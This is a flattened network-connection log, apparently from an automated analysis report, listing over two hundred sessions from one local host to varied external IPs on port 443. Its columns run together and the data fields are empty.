                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10174192.168.2.135565685.83.233.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10175192.168.2.133698070.50.33.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10176192.168.2.1354558153.74.8.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10177192.168.2.133639874.100.155.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10178192.168.2.134281062.156.43.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10179192.168.2.1360908124.237.72.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10180192.168.2.1339962188.201.13.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10181192.168.2.1356544125.169.96.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10182192.168.2.1355146181.24.117.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10183192.168.2.13568509.30.106.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10184192.168.2.134370290.178.74.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10185192.168.2.1348014143.3.1.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10186192.168.2.133661694.90.240.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10187192.168.2.135179288.159.235.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10188192.168.2.1346698192.59.147.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10189192.168.2.1344304161.31.143.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10190192.168.2.1354358187.226.232.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10191192.168.2.1345346180.207.59.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10192192.168.2.135107657.158.7.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10193192.168.2.1358314166.54.251.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10194192.168.2.133743496.64.59.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10195192.168.2.1348596205.81.120.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10196192.168.2.134510840.47.218.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10197192.168.2.1358056133.46.218.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10198192.168.2.1346334118.228.55.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10199192.168.2.1355780189.106.219.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10200192.168.2.134417893.5.77.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10201192.168.2.13470088.175.45.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10202192.168.2.1332816149.250.122.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10203192.168.2.1355636130.114.119.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10204192.168.2.133765477.208.105.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10205192.168.2.1338190202.171.251.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10206192.168.2.1337540102.101.72.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10207192.168.2.1338390150.117.96.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10208192.168.2.135865091.185.18.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10209192.168.2.1347282143.78.119.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10210192.168.2.1342200139.137.52.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10211192.168.2.1353962179.170.80.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10212192.168.2.1342524120.137.90.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10213192.168.2.133385442.117.205.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10214192.168.2.1360220162.151.30.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10215192.168.2.1360776197.65.27.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10216192.168.2.1357122105.82.91.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10217192.168.2.1333056212.92.23.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10218192.168.2.135133095.138.17.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10219192.168.2.13457222.150.13.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10220192.168.2.1357430169.71.213.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10221192.168.2.134426047.183.83.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10222192.168.2.1359428172.184.244.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10223192.168.2.133872074.238.211.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10224192.168.2.1332860112.71.223.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10225192.168.2.1347740100.139.153.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10226192.168.2.134990261.170.89.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10227192.168.2.135926297.251.38.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10228192.168.2.134672437.242.130.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10229192.168.2.134581074.193.225.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10230192.168.2.1345296211.5.129.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10231192.168.2.1350318124.105.218.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10232192.168.2.1348558110.71.165.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10233192.168.2.1337556197.141.118.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10234192.168.2.135595294.114.155.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10235192.168.2.1360680153.40.109.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10236192.168.2.133857219.113.114.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10237192.168.2.1360462176.164.53.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10238192.168.2.133422297.163.131.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10239192.168.2.134488876.224.45.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10240192.168.2.135020278.93.117.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10241192.168.2.1350484211.186.84.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10242192.168.2.1360578185.237.86.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10243192.168.2.1338530172.177.160.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10244192.168.2.1337342140.42.61.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10245192.168.2.1352332161.141.120.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10246192.168.2.1339716143.52.106.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10247192.168.2.1354848166.193.122.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10248192.168.2.13561384.128.42.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10249192.168.2.1354392207.72.198.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10250192.168.2.1335056100.165.132.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10251192.168.2.135726477.94.41.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10252192.168.2.134426669.106.65.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10253192.168.2.1334444185.53.193.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10254192.168.2.133853448.23.117.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10255192.168.2.135302861.69.8.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10256192.168.2.135437660.169.173.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10257192.168.2.1341506177.70.166.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10258192.168.2.135037089.166.109.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10259192.168.2.133952438.218.62.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10260192.168.2.135888048.196.218.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10261192.168.2.1351246140.207.26.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10262192.168.2.1336866170.35.136.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10263192.168.2.134361678.254.5.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10264192.168.2.1352608162.109.95.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10265192.168.2.136097044.191.1.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10266192.168.2.135976294.141.40.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10267192.168.2.1349594154.202.67.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10268192.168.2.1344042108.226.108.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10269192.168.2.1338398210.251.200.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10270192.168.2.134387076.41.137.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10271192.168.2.133796890.191.17.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10272192.168.2.133693263.48.53.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10273192.168.2.1336728144.59.225.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10274192.168.2.1344462163.112.220.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10275192.168.2.133750097.93.212.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10276192.168.2.1341356204.223.33.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10277192.168.2.1353932115.73.244.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10278192.168.2.1339254176.78.68.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10279192.168.2.1358970187.162.93.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10280192.168.2.1356344103.208.221.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10281192.168.2.1359456188.149.35.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10282192.168.2.133730267.107.120.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10283192.168.2.134495080.134.5.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10284192.168.2.1360508198.226.60.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10285192.168.2.134007424.106.75.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10286192.168.2.1351670223.171.111.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10287192.168.2.1359216176.193.81.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10288192.168.2.1360452194.216.246.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10289192.168.2.1348330164.20.86.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10290192.168.2.1356444183.193.79.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10291192.168.2.1359416117.11.167.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10292192.168.2.1355526164.198.117.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10293192.168.2.1351912203.238.226.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10294192.168.2.133953869.62.137.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10295192.168.2.1348840154.217.207.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10296192.168.2.1352788151.241.74.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10297192.168.2.135550898.61.1.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10298192.168.2.1348362128.140.93.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10299192.168.2.1340292173.92.217.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10300192.168.2.1339278218.90.163.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10301192.168.2.1342038177.26.249.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10302192.168.2.1353796221.56.33.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10303192.168.2.1343522184.36.224.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10304192.168.2.134273845.93.205.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10305192.168.2.1352180163.117.154.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10306192.168.2.135749081.45.190.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10307192.168.2.1342726134.55.40.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10308192.168.2.1351302148.176.5.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10309192.168.2.133464493.123.102.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10310192.168.2.1344274142.0.60.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10311192.168.2.1347858170.123.148.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10312192.168.2.133800864.149.164.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10313192.168.2.1360488114.11.255.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10314192.168.2.135946873.112.226.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10315192.168.2.135105485.91.221.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10316192.168.2.1336288144.11.222.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10317192.168.2.134771697.238.196.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10318192.168.2.1341014219.243.71.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10319192.168.2.1350306105.10.104.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10320192.168.2.1349212117.91.248.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10321192.168.2.135597060.236.55.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10322192.168.2.1348214167.5.11.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10323192.168.2.1341242213.222.119.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10324192.168.2.1348228222.56.81.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10325192.168.2.134480872.147.138.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10326192.168.2.1335964169.33.111.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10327192.168.2.1347878188.118.171.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10328192.168.2.134630223.15.127.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10329192.168.2.133605060.29.114.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10330192.168.2.1348950196.152.9.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10331192.168.2.1347140169.12.85.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10332192.168.2.1342232110.206.15.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10333192.168.2.133369832.173.63.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10334192.168.2.135706049.210.0.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10335192.168.2.1340132143.228.89.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10336192.168.2.1349900180.68.121.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10337192.168.2.135544899.231.137.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10338192.168.2.1354732209.96.163.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10339192.168.2.135000052.23.147.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10340192.168.2.135968813.50.52.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10341192.168.2.1355468115.114.128.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10342192.168.2.1352950164.66.26.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10343192.168.2.135456696.109.22.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10344192.168.2.1342726220.155.139.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10345192.168.2.1355770211.102.254.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10346192.168.2.1350438174.190.247.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10347192.168.2.1339930182.50.96.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10348192.168.2.1346376213.155.252.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10349192.168.2.135782869.63.218.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10350192.168.2.1335704172.191.190.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10351192.168.2.1333372165.11.177.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10352192.168.2.133820666.125.90.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10353192.168.2.134313281.48.216.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10354192.168.2.135716864.153.16.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10355192.168.2.1336232198.208.4.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10356192.168.2.133650081.79.119.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10357192.168.2.134098073.13.74.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10358192.168.2.1336276199.196.28.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10359192.168.2.1337404117.165.169.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10360192.168.2.1347068122.92.72.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10361192.168.2.134776431.102.123.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10362192.168.2.13481288.165.93.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10363192.168.2.1357826146.190.203.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10364192.168.2.134501437.198.19.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10365192.168.2.134083014.192.124.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10366192.168.2.1359152212.157.14.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10367192.168.2.1348448213.149.186.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10368192.168.2.135471296.23.106.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10369192.168.2.135627257.28.216.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10370192.168.2.1359776103.160.0.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10371192.168.2.135701419.69.157.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10372192.168.2.1349832203.117.3.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10373192.168.2.135564834.221.40.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10374192.168.2.1337778104.175.79.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10375192.168.2.134312877.166.232.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10376192.168.2.1341316204.174.254.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10377192.168.2.1348484192.55.146.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10378192.168.2.135937461.120.230.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10379192.168.2.135403858.79.202.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10380192.168.2.135501279.131.111.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10381192.168.2.133849471.78.79.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10382192.168.2.1334444115.246.125.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10383192.168.2.1344788148.209.115.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10384192.168.2.1343920146.249.249.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10385192.168.2.134459420.80.119.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10386192.168.2.133755643.116.41.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10387192.168.2.134105878.62.25.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10388192.168.2.134947865.185.196.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10389192.168.2.1337324111.56.228.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10390192.168.2.1345734113.188.45.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10391192.168.2.134284245.201.175.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10392192.168.2.1333874196.5.154.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10393192.168.2.1335204150.213.94.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10394192.168.2.1354278108.104.54.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
